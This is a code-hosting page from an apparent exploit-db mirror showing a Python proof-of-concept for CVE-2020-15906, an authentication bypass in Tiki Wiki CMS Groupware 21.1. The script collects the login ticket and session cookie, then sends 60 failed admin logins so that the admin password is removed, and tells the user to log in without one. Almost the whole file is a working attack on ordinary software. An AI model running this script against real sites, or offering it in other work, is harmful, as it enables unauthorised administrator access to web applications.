bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/48927.py
Offensive Security b4c96a5864 DB: 2021-09-03 
28807 changes to exploits/shellcodes
2021-09-03 20:19:21 +00:00

90 lines
No EOL
5.7 KiB
Python
Executable file
Raw Blame History

This file contains invisible Unicode characters

This file contains invisible Unicode characters that are indistinguishable to humans but may be processed differently by a computer. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# Exploit Title: Tiki Wiki CMS Groupware 21.1 - Authentication Bypass
# Date: 01.08.2020 (1st August 2020)
# Exploit Author: Maximilian Barz aka. Silky
# Vendor Homepage: tiki.org
# Software Link: https://jztkft.dl.sourceforge.net/project/tikiwiki/Tiki_21.x_UY_Scuti/21.1/tiki-21.1.zip
# Version: 21.1
# Tested on: Kali Linux 5.7.0-kali1-amd64
#!/usr/bin/env/python3
import requests
import json
import lxml.html
import sys
banner = '''
████████ ██ ██  ██ ██ ██  ██ ██ ██  ██ ██  ██████  ██  ██ 
   ██    ██ ██  ██  ██ ██  ██ ██ ██  ██  ██       ██ ███  ███ 
██  ██ █████   ██ ██  █  ██ ██ █████   ██  █████   ██   ██ 
██  ██ ██  ██  ██ ██ ███ ██ ██ ██  ██  ██  ██      ██  ██ 
██  ██ ██  ██ ██  ███ ███  ██ ██  ██ ██  ███████  ██ ██ ██ 
█████  ██  ██ ████████ ██  ██ ███████ ███  ██ ████████ ██  ██████  █████  ████████ ██  ██████  ███  ██  ██████  ██  ██ ██████  █████  ███████ ███████ 
██   ██ ██  ██    ██    ██  ██ ██      ████  ██    ██    ██ ██      ██   ██    ██    ██ ██    ██ ████  ██  ██   ██  ██  ██  ██   ██ ██   ██ ██      ██      
███████ ██  ██  ██  ███████ █████  ██ ██  ██  ██  ██ ██  ███████  ██  ██ ██  ██ ██ ██  ██  ██████    ████   ██████  ███████ ███████ ███████ 
██   ██ ██  ██  ██  ██   ██ ██     ██  ██ ██  ██  ██ ██  ██   ██  ██  ██ ██  ██ ██  ██ ██  ██   ██   ██   ██      ██   ██      ██      ██ 
██  ██  ██████   ██  ██  ██ ███████ ██   ████  ██  ██  ██████ ██  ██  ██  ██  ██████  ██   ████   ██████   ██  ██  ██  ██ ███████ ███████ 
Poof of Concept for CVE-2020-15906 by Maximilian Barz, Twitter: S1lky_1337
'''
def main():
if(len(sys.argv) < 2):
print(banner)
print("Usage: %s <host> " % sys.argv[0])
print("Eg: %s 1.2.3.4 " % sys.argv[0])
return
rhost = sys.argv[1]
url = "http://"+rhost+"/tiki/tiki-login.php"
session = requests.Session()
def get_ticket():
r = requests.get(url)
login_page = r.text.encode('utf-8')
html = lxml.html.fromstring(login_page)
auth = html.xpath('//input[@name="ticket"]/@value')
return str(auth)[2:-2]
def get_cookie():
session.get(url)
return session.cookies.get_dict()
cookie = get_cookie()
ticket = get_ticket()
payload = {'ticket': ticket,'user':'admin', 'pass':'test','login':'','stay_in_ssl_mode_present':'y','stay_in_ssl_mode':'n'}
headers = {
'Host': rhost,
'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language': 'en-US,en;q=0.5',
'Accept-Encoding': 'gzrhost, deflate',
'Referer': 'http://'+rhost+'/tiki/tiki-login.php',
'Content-Type': 'application/x-www-form-urlencoded',
'Content-Length': '125',
'Connection': 'close',
'Upgrade-Insecure-Requests': '1',
'Cache-Control': 'max-age=0',
}
for i in range(60):
r = session.post(url, payload, headers)
if("Account requires administrator approval." in r.text):
print("Admin Password got removed.")
print("Use BurpSuite to login into admin without a password ")
if(__name__ == '__main__'):
main()
Reference in a new issue View git blame Copy permalink